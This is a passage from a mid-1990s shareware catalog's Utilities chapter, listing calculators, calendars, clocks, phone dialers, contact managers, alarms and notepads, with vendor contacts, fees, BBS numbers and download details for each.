1 + free update disk(s) sent out. + Look for: CALJNC95.SDN on BBSs (call 215-721-7039 to download it + at no charge); CALJNC.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 6 (or contact userID 76665,3443 for assistance); + CALJNC.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID J.COX32 for assistance). + SWREG#: 187 + PsL#: 10738 + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Automatic conversions between decimal, hex, octal and binary. + Logical operations supported: not, and, nand, or, xor, nor, + neg, rol, ror, modulus. Entry of complex floating point + calculations supported. Logarithms, sin, cos, tan, hyperbolas, + time, fixed, decimal, pi, roots, factorials, and much more. + Other features: + * Load as a TSR + * Displayable memories + * Colors + * Moveable anywhere on screen + * On-line help + * Printer support + * Interactive manual + + Chapter 2, "Utilities" 148 + + + + Product: Convert + Author: Bit Masons Consulting, 508-898-3321 + Version: 2.01 (06-03-93) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk. + Registration fee: $15.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, BBS, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: CVT201.ZIP on BBSs (call 508-875-3618 to download it at + no charge); CVT201.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 6 (or contact userID 72561,2637 for assistance). + Download size: 348k (about 26 minutes with a 2400 baud modem) + Description: + This units conversion calculator for Windows includes MANY + common and not-so-common unit conversions (inches to + centimeters, mph to furlongs per fortnight, and so forth). + What's different about Convert, though, is that you can easily + add your own unit conversions with any text editor (or use the + built-in one). Convert can even handle conversions which + require an offset such as Farenheit to Centigrade. Other + features include cutting and pasting for chain calculations and + control over output format. + + + Product: Convert It!(tm) SE + Versatile unit of measure converter. See full description on + page 384. + + Product: Home Refinancing + Compute time value savings from refinancing. See full + description on page 393. + + Product: Judy's TenKey + Author: Judy's Applications, 408-244-0744 + Version: 3.0 (10-20-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $19.95 (add $2.95 for shipping to U.S. + addresses) (add $2.95 for shipping to Canadian addresses) (add + $2.95 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of + CompuServe, mail support; 3-month return policy; bonus + utilities; discounts on other products. + Look for: 10KEY30.ZIP on BBSs; 10KEY.ZIP on CompuServe in + CIS:WINSHA forum LIBrary 17 (or contact userID 70574,2247 for + assistance). + Download size: 188k (about 14 minutes with a 2400 baud modem) + Description: + Powerful Windows calculator with nearly every feature + imaginable, including ascrolling tape you can save, print, + resize, and even edit (causing the tape to automatically + recalculate); selectable syntax (normal, RPN, or tenkey adding + + Chapter 2, "Utilities" 149 + + + + machine); financial dialogs; customizable display; keep on top + option; "Tip of the Day", and much more. You will never go + back to the default Windows calculator. + + + 2.6.3 Calendars + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 166. + + Product: Ample Notice + Author: Granny's Old-Fashioned Software, 704-264-6906 + Version: 3.00 (07-12-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $30.00 + Registration benefits: Printed manual, master disks, future + update, support. + Look for: availability unknown on BBSs; AN300.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 7 (or contact userID 73577,230 for + assistance). + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + An appointments calendar/alarm clock package that can help + organize your life. You can easily record birthdays (with ages + updated each year), a meeting every other Tuesday at 4:00 for 5 + meetings, Father's Day (third Sunday in June), and many other + date patterns. + + Appointments automatically set a 'pop-up alarm clock'. + Printouts can be obtained in many styles for reference away + from your computer. Mouse support, help, menus, and + customization. + + + Product: Calendar Mate + Author: Hawk Software, 306-543-8899 + Version: 4.2 (02-01-93) + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Registration fee: $28.00 + Registration benefits: Master disks, unlimited phone support. + Look for: CALMATE4.ZIP on BBSs (call 306-777-4493 to download it + at no charge); CALM42.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 7 (or contact userID 75130,1650 for assistance). + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + A full featured calendar program that is extremely user + friendly and flexible. Its major distinctives are its ability + to print daily, monthly and yearly calendars and its + flexibility in defining repeating events. Many different + intervals may be specified such as 'annually' or 'last workday + of the month'. Different events files may be easily maintained + and calendars may be printed in English, Spanish, French or + German. A fine, inexpensive calendar program. + + Chapter 2, "Utilities" 150 + + + + Product: ChronoLog + Personal info/resource mgmt system for DOS. See full + description on page 168. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 169. + + Product: Daily Log Book + Diary or Journal. See full description on page 181. + + Product: DARN! Don't Forget! + Events Reminder for Windows. See full description on page 169. + + Product: Dear Diary + Diary/daily journal. See full description on page 181. + + Product: Early Bird + Early Bird. See full description on page 178. + + Product: Family Calendar for Windows + Author: Command Line Software, 970-667-4566 + Version: 1.30 (04-18-95) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: HP DeskJet printer; HP LaserJet printer. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, fax, BBS, CompuServe, mail support; 1-month + return policy; bonus data; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 12-month bound calendar using + your data. + Look for: FAMCAL13.ZI on BBSs (call 970-663-5507 to download it + at no charge); FAMCAL.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 72673,357 for assistance). + SWREG#: 4198 + PsL#: 11735 + Download size: 232k (about 17 minutes with a 2400 baud modem) + Description: + Prints family oriented professional quality wall calendars. + Give calendars as annual gifts to family and friends. Make $$$ + yourself printing calendars for others. Also prints unique + (purse or pocket) "shopping list". Supports International date + formats and A4 paper size. Prints formatted and sorted events + list and blank data collection sheets. Supports laser and other + graphic printers, including most dot matrix printers. + + + Product: Mayan Calendar [***] + Converts Mayan/modern calendar dates. See full description on + page 598. + + Chapter 2, "Utilities" 151 + + + + Product: Open Menu + Flexible fast general purpose menu program. See full + description on page 189. + + Product: Personal Calendar (PC) for DOS + TSR PIM appointment reminder, clock, calendar. See full + description on page 173. + + Product: Personal Schedule + Author: Will Baldwin, 913-381-9109 + Version: 1.02 (04-20-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Mouse; math coprocessor. + Registration fee: $10.00 + Registration benefits: 31/2" master disk(s); 12 months of phone, + fax, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: PRSCD102.ZIP on BBSs. + SWREG#: 5471 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Calendar/schedule/project manager. Personal Schedule manages + personal, family, group, and project calendar schedules, + reminding when tasks are due, and automatically calculating due + dates for recurring tasks. It features both Interactive and + Batch modes. In batch mode (i.e. Autoexec.bat), it will scan + your schedule and pop up a window if it finds a current + uncompleted task. Ideal for work or home. No limit on # of + schedules that can be created. Pull-down menus, dialog boxes, + mouse control. + + + Product: RagTime for Windows + Author: Unique Software Productions, 310-866-1932 + Version: 1.0a (10-15-93) + Needs: IBM 80386, Windows 3.0 or better. 640k RAM; Hard disk; + Hayes-compatible modem; Mouse. VBRUN300.DLL. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 1 + months of CompuServe, mail support; 1-month return policy; all + ASP-wide offers (see page 6). + Look for: RAGTIME.ZIP on BBSs (call 310-864-3062 to download it + at no charge). + Download size: 380k (about 28 minutes with a 2400 baud modem) + Description: + As the name implies: it keeps track of a girl's "." Why keep + notes? Why risk a vacation at the wrong time of the month? Why + suffer embarassing questions? Now for the first time, it's easy + to keep track of "it." Keeps track of 3 persons. + + Chapter 2, "Utilities" 152 + + + + Product: Reminder + Author: Wilson WindowWare, Inc., 206-938-1740 + Version: 1.3F (02-01-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; EGA + monitor. + Registration fee: $59.95 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: quick-reference card; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6). + Look for: RM-13F.ZIP on BBSs (call 206-935-5198 to download it at + no charge); RM-13F.ZIP on CompuServe in CIS:WILSON forum + LIBrary 15 (or contact userID 76702,1072 for assistance). + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Designed to let you setup and view your appointments as easily + as possible. Items and tasks are sorted by date and time + placing all items needing attention on to so you can "see" what + is next on your list. Windows Reminder supports DDE and MS + Mail. Alarms can be set to do a variety of tasks. Applications + can be launched at specific times. + + + Product: TASK MASTER + Project tracking program. See full description on page 353. + + Product: TC's Personal Data Manager + Keep track of addresses and phone numbers. See full + description on page 175. + + Product: TC's Toolbox + Nine Windows programs, view files & lots more. See full + description on page 65. + + Product: Visual Calendar Planner + A desktop planner similar to office planner. See full + description on page 176. + + Product: x-CAL3 + Network calendar system. See full description on page 430. + + Product: Yellow Sticky for Windows 3.1 + Windows 3.1 reminder program. See full description on + page 179. + + Chapter 2, "Utilities" 153 + + + + 2.6.4 Clocks + + Product: Clickometer + Author: Sapphire Software Inc., 808-395-5587 + Version: 1.1 (11-29-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $15.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited phone, CompuServe, mail + support; 1-month return policy; discounts on upgrades. + Look for: CLKMTR11.ZIP on BBSs; CLKMTR.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 71223,3653 for + assistance). + SWREG#: 3941 + PsL#: 11694 + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + Knowing when to take a break may help to reduce repetitive- + strain injuries (RSI). This utility counts keystrokes, mouse + clicks, and tracks mouse movement. It issues warning notices + when activity thresholds are exceeded. Real-time counters are + displayed like odometers. Reports show profiles of user input + activity. On-line help provided. Dynamic Link Library can be + used by your own programs. + + + Product: Drag 'n' Drop Utils for Win NT + Utils for NT: clocks, wallpaper, recycler, &c. See full + description on page 143. + + Product: Personal Calendar (PC) for DOS + TSR PIM appointment reminder, clock, calendar. See full + description on page 173. + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 217. + + Product: Visual Calendar Planner + A desktop planner similar to office planner. See full + description on page 176. + + Product: XFile + Multifunction desktop utility for Windows. See full + description on page 146. + + 2.6.4.1 Precision timers + + Product: TC's Toolbox + Nine Windows programs, view files & lots more. See full + description on page 65. + + Chapter 2, "Utilities" 154 + + + + 2.6.5 Phone dialers + + See also: Communications, Call logging & analysis. + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 166. + + Product: buttonFile + Easy Windows personal filer, predefined cards. See full + description on page 281. + + Product: Contact Browser [***] + Author: Moore Software Solutions, 619-672-1479 + Version: 2.5b (08-25-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; VGA monitor; + Hard disk; XMS memory. + Strongly recommended: SVGA monitor; HP DeskJet printer; HP + LaserJet printer; Hayes-compatible modem; Mouse; Epson printer. + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; 3-month limited return policy; site + license; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: availability unknown on BBSs; PHONE.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 12 (or contact userID 72774,3705 + for assistance). + SWREG#: 5066 + Download size: 1277k (about 95 minutes with a 2400 baud modem) + Description: + Can be used at home or for business. Includes fields for names, + addresses, six phone numbers, special dates, E-Mail ID's, and + comments. Uses categories for grouping contacts for reports and + label printing. Unlimited number of entries, automatically + sorted. Searching, modem dialing, full featured customizable + reports and label printing, import/export, call histories, OLE + 2.0 and E-Mail capabilities. + + + Product: The Dialer + Author: GRH Software, 616-676-2270 + Version: 2.30 (08-26-93) + Needs: IBM PC, DOS 2.0 or better. 138k RAM; CGA monitor; Hayes- + compatible modem. + Registration fee: $15.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, GEnie, mail + support; all ASP-wide offers (see page 6); discounts on other + + Chapter 2, "Utilities" 155 + + + + products. 12-month free upgrading allowed. 12 free update + disk(s) sent out. + Look for: DIAL23.ZIP on BBSs; DIAL23.ZIP on CompuServe in + CIS:IBMCOM forum LIBrary 6 (or contact userID 75676,556 for + assistance); DIAL23.ZIP on GEnie in IBMPC forum LIBrary 15 (or + contact userID G.HEITZ for assistance). + Download size: 1k (about one minute with a 2400 baud modem) + Description: + Feature packed telephone autodialer. Features include a call + timer, note pad, log that saves the name, time, date, and your + notes, easy to use macros, the capacity for an unlimited amount + of names and numbers, quick search and find, dials long number + sequences which makes even credit card calls a breeze, and much + more. COM1 or COM2 + + + Product: Easydial + Author: Patri-Soft, 909-352-2820 + Version: 4.5 (01-22-93) + Needs: IBM PC, DOS 2.0 or better. CGA monitor; Hercules monitor; + Hard disk; Modem. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: ED45.ZIP on BBSs (call 909-352-2825 to download it at + no charge); ED45.ZIP on CompuServe in CIS:IBMCOM forum LIBrary + 2 (or contact userID 76347,2477 for assistance); ED45.ZIP on + GEnie in IBMPC-615 forum LIBrary 6 (or contact userID PATRISOFT + for assistance). + Download size: 74k (about six minutes with a 2400 baud modem) + Description: + Dial your phone with your modem quickly and easily. Quick to + master; one of the best dialers available. You may log and time + calls, make difficult credit card calls, and even ignore a + certain area code. Great for turning call forwarding on/off, + contacting pagers and more! The dialer that you have been + looking for! + + + Product: Folders + Personal information manager network email. See full + description on page 171. + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 188. + + Product: Link + Connects program to callback service. See full description on + page 421. + + Chapter 2, "Utilities" 156 + + + + Product: Little Black Book + Author: Q&D Software Development, 201-635-1824 + Version: 3.0 (10-25-94) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: Modem; Mouse. + Registration fee: $19.00 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe support; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: LBB.ZIP on BBSs (call 201-886-8048 to download it at no + charge); LBB.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 7 + (or contact userID 76336,3271 for assistance). + SWREG#: 3202 + PsL#: 11661 + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + A popular favorite. It allows users to store names, addresses, + phone numbers, and up to 64K of notes per record. Includes + print and print-preview features as well as a full-featured on- + line context sensitive Windows help system. Also has an + intuitive toolbar interface in addition to the standard menu + structure interface. Data is created in MS-Access 2.0 format + for easy portability to other popular applications. + + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 397. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 355. + + Product: PCFDial + Author: Barn Owl Software, 618-632-7345 + Version: 1.05 (05-26-92) + Needs: IBM PC, DOS 2.0 or better. 7k RAM; Hard disk; Hayes- + compatible modem. + Registration fee: $19.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); 12 months of unlimited + phone, fax, CompuServe, newsletter, mail support; 1-month + return policy; all ASP-wide offers (see page 6); discounts on + other products. + Look for: PCFD-105.ZIP on BBSs (call 618-632-2339 to download it + at no charge); PCFDIL.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 74017,1344 for assistance); + + Chapter 2, "Utilities" 157 + + + + PCFD-103.ZIP on GEnie in IBMPC forum LIBrary 0 (or contact + userID R.ROSENBERGE for assistance). + SWREG#: 835 + PsL#: 10362 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Awards & nominations: 1991 winner, Public Brand Software + contests for useful programs. + Description: + This 7k swapping TSR dials voice phone numbers displayed by + other programs (such as database software). Can dial "vanity" + numbers like 800-IBM-DISK or numbers split apart on separate + lines. Keeps a log of calls and displays the local time for + each area code. Pops up at regular intervals to let you know + how long you've talked (useful for salesmen who must "close the + deal" in a set amount of time). Context sensitive help. + + + Product: TC's Toolbox + Nine Windows programs, view files & lots more. See full + description on page 65. + + Product: VB-Dial + Author: Unique Software Productions, 310-866-1932 + Version: 2.1c (11-05-93) + Needs: IBM 80386, Windows 3.0 or better. 640k RAM; VGA monitor; + Hard disk; Hayes-compatible modem; Mouse; sound card. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 1 + months of phone, BBS, CompuServe, mail support. + Look for: VBDIAL_A.ZIP on BBSs (multiple files) (call + 310-864-3062 to download it at no charge); VBDIAL.ZIP on + CompuServe in CIS:IBMCOMM forum LIBrary 4 (multiple files) (or + contact userID 70322,211 for assistance). + Download size: 491k (about 37 minutes with a 2400 baud modem) + Description: + The first multimedia dialer out! A phone-dialer & basic + communications package for Windows 3.x. Has a "NeXT-like" 3D + control panel. Names & numbers displayed in a scrollable pick- + list, with a "smartkeys" speedsearch. Dial to talk, or for BBS. + Has full ANSI colors, backscroll, Zmodem, macros, session-logs + & more! Shortcut keys emulate Telix. Supports up to 19200 + baud. Reads & edits SideKick or any ASCII datafile. Online + help. Customize colors & fonts. + + Chapter 2, "Utilities" 158 + + + + 2.6.5.1 Rolodex programs + + Product: Address Manager + Author: Wilson WindowWare, Inc., 206-938-1740 + Version: 2.1 (04-01-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; VGA + monitor; Hard disk. + Registration fee: $39.95 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; 3-month return policy; all + ASP-wide offers (see page 6). + Look for: AM-21C.ZIP on BBSs (call 206-935-5198 to download it at + no charge); AM-21C.ZIP on CompuServe in CIS:WILSON forum + LIBrary 15 (or contact userID 76702,1072 for assistance). + Download size: 600k (about 45 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + A handy address manager with advanced printing capabilities. + Define up to 32 categories. Assign and remove names from + categories. Print labels, envelopes, and lists by category. + Search for names, companies, anything. Handles sophisticated + dialing via modem. Variations in area codes are easily handled. + Works as well on the road as it does in the office. + + + Product: Calling Cards + Author: My Little Realm Enterprises, 201-529-8318 + Version: 3.2 (04-11-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support. 3-month + return policy. 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MLRCC32.ZIP on BBSs; MLRCC.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0. + Download size: 240k (about 18 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Keeps all of your names and numbers at your fingertips. Need + your plumber fast... but can't recall a name or company? Just + tell Calling Cards to find your plumber. You can print bulk + labels, single labels, and categories of labels. Also prints + Rolodex cards, envelopes and checklists. Checklists are great + for keeping track of who responds to the RSVP invitations that + you send out for weddings, client queries, parties, etc. + + Chapter 2, "Utilities" 159 + + + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 364. + + Product: Contact Manager + Author: CPI computer services, 702-329-6868 + Version: 2.21 (10-12-94) + Needs: IBM AT (80286), DOS 3.3 or better. 640k RAM. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $7.50 for shipping to Canadian addresses) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 315k (about 24 minutes with a 2400 baud modem) + Description: + Helps you manage names, phone numbers, and information, for + your contacts. You can print mail labels and Rolodex type pin + fed cards. + + + Product: dbDIAL(tm) + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Version: 1.02 (01-06-92) + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Strongly recommended: Hayes-compatible modem. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of toll 900# phone, fax, CompuServe, + GEnie, mail support. + Look for: DBD-?.ZIP on BBSs (multiple files); DBD-?.ZIP on + CompuServe in CIS:OAFORUM forum LIBrary 4 (multiple files) (or + contact userID 76711,1141 for assistance); DBD-?.ZIP on GEnie + in IBMPC forum LIBrary 0 (multiple files) (or contact userID + P.MAYER1 for assistance). + Download size: 490k (about 37 minutes with a 2400 baud modem) + Description: + This 7k TSR database dials the phone, logs your calls, reminds + you when to make a call, pastes an address into your word + processor plus much more! Has hooks into the GRAB Plus(r) + program for printing envelopes and has a built in mail merge + system. + + Chapter 2, "Utilities" 160 + + + + Product: FF Business Cards + Author: M & R Technologies, Inc., 407-951-2268 + Version: 1.0 (12-08-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + HP DeskJet printer; HP LaserJet printer; Postscript printer; + Mouse. Laser printer capable of single-sheet feeds. + Registration fee: $19.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; bonus graphics; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Look for: FFBCRD.ZIP on BBSs; FFBCRD.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 7 (or contact userID 72103,505 for + assistance). + Download size: 349k (about 26 minutes with a 2400 baud modem) + Description: + Features a "drag and drop" interface allowing you to create + stunning business and rotary (rolodex) cards and then print + them on your printer. You can place text, pictures, lines and + rectangles. Use all your fonts and bitmaps! Links to + Paintbrush to edit/create picture images. Many examples + included to get you started quickly. Use it to print coupons, + appointment cards, tickets, anything you would want to print on + a card! + + + Product: FONEFILE + Author: Business Enhancement Partnership Group, 909-354-5251 + Version: 5.0a (10-01-93) + Needs: IBM PC, DOS 3.0 or better. 5k RAM; Hard disk. + Strongly recommended: EMS memory. + Registration fee: $19.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; 3-month return policy; all ASP-wide offers (see + page 6); disks of other shareware. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; FONEFL.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 9 (or contact userID 76636,2764 for + assistance). + Download size: 91k (about seven minutes with a 2400 baud modem) + Description: + A full featured name and address database. Optional TSR feature + allows pop-Up access to your names without leaving your current + DOS programs. Names automatically sorted by last name and + never needs re-indexing. Ample room to enter full address, 2 + telephone numbers and 2 comment lines. Optional 'default' value + fields makes data entry fast and easy. Prints reports, labels, + Rolodex(r) cards, and post cards. Creates 'mail-merge'. Mouse + support for added ease of use. + + Chapter 2, "Utilities" 161 + + + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 172. + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 294. + + Product: Rolodeck + Author: Henning Associates, 804-823-6896 + Version: 1.0 (05-03-95) + Needs: IBM AT (80286), Windows 3.1 or better. 70k RAM. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $8.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: availability unknown on BBSs; ROLO10.ZIP on CompuServe + in CIS:WINSHAR forum LIBrary 0 (or contact userID 72176,2507 + for assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Puts your desktop rolodex into Windows. Alphabet bar allows + quick access through out your file. Page curls allow changing + pages by clicking the mouse. + + + Product: TC's Personal Data Manager + Keep track of addresses and phone numbers. See full + description on page 175. + + Product: WinGRAB for Windows + Windows phone contact mgr & envelope printing. See full + description on page 100. + + Product: x-CON3 + Network contacts management system. See full description on + page 430. + + Product: x-FONE3 + Network phone directory system. See full description on + page 431. + + Product: x-FONE4 + Network phone directory system for Windows. See full + description on page 432. + + 2.6.6 Alarms + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 166. + + Chapter 2, "Utilities" 162 + + + + Product: Ample Notice + Very flexible appointment scheduler/alarm. See full + description on page 149. + + Product: Clickometer + Warns when keybd/mouse activity exceed limits. See full + description on page 153. + + Product: DDKEY + Powerful 7.5K TSR key redefinition utility. See full + description on page 71. + + Product: DR. Memory + Author: Cooney Applied Technology + Version: 3.3 (01-09-94) + Needs: IBM PC, DOS 3.3 or better. 250k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: lifetime BBS, CompuServe, mail support; + all ASP-wide offers (see page 6). + Look for: DRM33.ZIP on BBSs (call 513-274-0821 to download it at + no charge); DRM33.ZIP on CompuServe in CIS:IBMSYS forum LIBrary + 7 (or contact userID 71001,1370 for assistance). + Download size: 135k (about ten minutes with a 2400 baud modem) + Description: + yet another of the many "E-Z to use reminder" programs written + over the past few years that remind you of appointments, + holidays, etc. Has the good features of the others, yet none + of the complexity and complication, and is easy and quick to + use. User's Manual is included. Try it, you'll love it! + + + Product: Early Bird + Early Bird. See full description on page 178. + + Product: Personal Calendar (PC) for DOS + TSR PIM appointment reminder, clock, calendar. See full + description on page 173. + + Product: XFile + Multifunction desktop utility for Windows. See full + description on page 146. + + 2.6.7 ASCII charts + + Product: DDKEY + Powerful 7.5K TSR key redefinition utility. See full + description on page 71. + + Chapter 2, "Utilities" 163 + + + + 2.6.8 Notepads + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 223. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 224. + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 167. + + Product: buttonFile + Easy Windows personal filer, predefined cards. See full + description on page 281. + + Product: ClipMate for Windows + Multiple clipboard text and graphics. See full description on + page 213. + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 231. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 169. + + Product: FYI/For Your Eyes Only + Resumer writer/Address book/memo writer. See full description + on page 249. + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 290. + + Product: MEGA EDIT Editor for Windows + Text editor for large files. See full description on page 226. + + Chapter 2, "Utilities" 164 + + + + Product: Postit for Windows 3.1 + Author: Henning Associates, 804-823-6896 + Version: 3.0 (06-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; POSTIT30.ZIP on + CompuServe in CIS:WINSHARE forum LIBrary 0 (or contact userID + 72176,2507 for assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A Windows 3.1 popup note pad for making quick notes. Now has + more of a Windows touch and feel with variable size page and + note size. Includes a speed bar. Does not require the user to + load or store files and is capable of 10 pages with up to 32000 + characters each. This is the computer version of the yellow + sticky notes all over your desk. Many other features. + + + Product: Rolodeck + A Windows based business card file. See full description on + page 161. + + Product: TC's Personal Data Manager + Keep track of addresses and phone numbers. See full + description on page 175. + + Product: TC's Toolbox + Nine Windows programs, view files & lots more. See full + description on page 65. + + Product: Tikler + A fast, easy event reminder. See full description on page 176. + + Product: WinEdit Lite + A terrific Notepad replacement. See full description on + page 229. + + Product: WinJottr + Author: Open Windows, 719-531-0403 + Version: 1.0 (04-10-94) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk; VBRUN300.DLL. + Strongly recommended: Mouse. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of CompuServe, mail support; lifetime return policy; + bonus utilities; all ASP-wide offers (see page 6); disks of + + Chapter 2, "Utilities" 165 + + + + other shareware; discounts on upgrades. 12-month free upgrading + allowed. CompuServe membership offer. + Look for: JOTTR_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); JOTTR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 75236,3243 for assistance). + Download size: 94k (about seven minutes with a 2400 baud modem) + 